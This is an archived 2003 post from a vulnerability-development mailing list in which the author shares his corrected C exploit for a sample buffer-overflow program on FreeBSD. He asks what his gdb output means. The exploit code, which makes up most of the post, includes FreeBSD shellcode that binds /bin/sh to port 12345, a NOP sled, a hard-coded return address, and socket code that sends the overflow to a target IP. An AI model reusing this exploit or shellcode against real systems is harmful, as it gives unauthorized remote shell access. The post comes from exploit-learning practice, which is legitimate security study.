Vulnerability Development mailing list archives
Problem with sample buffer overflow exploit solved
From: Ganbold <ganbold () micom mng net>
Date: Thu, 02 Oct 2003 11:25:02 +0900
Hi, Thanks to all people who helped me. Finally I solved my problem:)Here is my corrected version of exploit. It worked in FreeBSD 5.1 and FreeBSD 4.7
-------------------------------------------------------------------------------------------------------------------------------
#include <stdio.h>
#include <netinet/in.h>
#include <netdb.h>
#include <sys/socket.h>
#include <sys/types.h>
#include <errno.h>
#include <unistd.h>
/*
* FreeBSD shellcode - binds /bin/sh to a port 12345
* Claes M. Nyberg 20020619
* <cmn () darklab org>, <md0claes () mdstud chalmers se>
*/
char shellcode[]= /* port _______*/
"\x6a\x10\x89\xe1\x83\xec\x10\x89\xe3\x31\xc0\x50\x50\x50\x66\x68\x30\x39"
"\xb4\x20\x66\x50\x89\xe2\x6a\x06\x6a\x01\x6a\x02\x50\x30\xe4\xb0\x61\xcd"
"\x80\x89\xc7\x6a\x10\x52\x50\x50\xb0\x68\xcd\x80\x31\xc0\x50\x57\x50\x83"
"\xc0\x6a\xcd\x80\x51\x53\x57\x50\xb0\x1e\xcd\x80\x89\xc3\x31\xc0\x50\x53"
"\x50\xb0\x5a\xcd\x80\xb0\x01\x50\x53\x50\x83\xc0\x59\xcd\x80\xb0\x02\x50"
"\x53\x50\x83\xc0\x58\xcd\x80\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62"
"\x69\x6e\x89\xe3\x50\x53\x89\xe2\x50\x52\x53\x50\xb0\x3b\xcd\x80\x31\xc0"
"\x40\x50\x50\xcd\x80";
#define RET 0xbfbffa48
int main(int argc, char *argv[]) {
char buffer[1064];
int s,t, i, size,offset;
struct sockaddr_in remote;
struct hostent *host;
if(argc != 4) {
printf("Usage: %s target-ip port offset\n", argv[0]);
return -1;
}
offset = RET - atoi(argv[3]);
// filling buffer with NOPs
memset(buffer, 0x90, 1064);
printf("scsize: %d\nret: 0x%x\n",sizeof(shellcode)-1,offset);
//copying shellcode into buffer, at offset 140,150,200 it works
finally :):):):)
memcpy(buffer+851-sizeof(shellcode) , shellcode, sizeof(shellcode)-1);
// Copying the return address multiple times at the end of the
buffer...
for(i=1010; i < 1060; i+=4) {
* ((int *) &buffer[i]) = offset;
}
buffer[1063] = 0x0;
//getting hostname
host=gethostbyname(argv[1]);
if (host==NULL)
{
fprintf(stderr, "Unknown Host %s\n",argv[1]);
return -1;
}
// creating socket...
s = socket(AF_INET, SOCK_STREAM, 0);
if (s < 0)
{
fprintf(stderr, "Error: Socket\n");
return -1;
}
remote.sin_family = AF_INET;
remote.sin_addr = *((struct in_addr *)host->h_addr);
remote.sin_port = htons(atoi(argv[2]));
// connecting with destination host
if (connect(s, (struct sockaddr *)&remote, sizeof(remote))==-1)
{
close(s);
fprintf(stderr, "Error: connect\n");
return -1;
}
//sending exploit string
size = send(s, buffer, sizeof(buffer), 0);
if (size==-1)
{
close(s);
fprintf(stderr, "sending data failed\n");
return -1;
}
// closing socket
close(s);
}
-------------------------------------------------------------------------------------------------------------------------------
The problem was before I placed shellcode in wrong place and shellcode
executed partly.
I moved my shellcode in different place and moved return address also and
it worked finally. Spawns shell
in port 12345.So it is really important to know where to place shellcode and return address. Also return address
must point to one of the NOPs before shellcode. One more question.When exploit is sent, in another terminal where I run vulnerable program from gdb I see:
------------------------------------------------------------------------------------------------------------------------------- (gdb) run 30460 The program being debugged has been started already. Start it from the beginning? (y or n) y Starting program: /usr/home/tsgan/bof_files/vulnerable 30460 client from 127.0.0.1 (no debugging symbols found)...(no debugging symbols found)... Program received signal SIGTRAP, Trace/breakpoint trap. Cannot remove breakpoints because program is no longer writable. It might be running in another process. Further execution is probably impossible. 0x080480c0 in ?? () ------------------------------------------------------------------------------------------------------------------------------- When I issue command x/200bx $esp-200 I see following: ------------------------------------------------------------------------------------------------------------------------------- (gdb) x/200bx $esp-200 0xbfbffd34: 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0xbfbffd3c: 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0xbfbffd44: 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0xbfbffd4c: 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0xbfbffd54: 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0xbfbffd5c: 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0xbfbffd64: 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0xbfbffd6c: 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0xbfbffd74: 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0xbfbffd7c: 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0xbfbffd84: 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0xbfbffd8c: 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0xbfbffd94: 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0xbfbffd9c: 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0xbfbffda4: 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0xbfbffdac: 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0xbfbffdb4: 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0xbfbffdbc: 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0xbfbffdc4: 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0xbfbffdcc: 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0xbfbffdd4: 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0xbfbffddc: 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0xbfbffde4: 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0xbfbffdec: 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0xbfbffdf4: 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00 (gdb)What does it mean? Is it mean that program exited cleanly? Or it says it executed shellcode correctly?
Can somebody explain me about it little bit? thanks in advance, Ganbold
Current thread:
- Problem with sample buffer overflow exploit solved Ganbold (Oct 03)
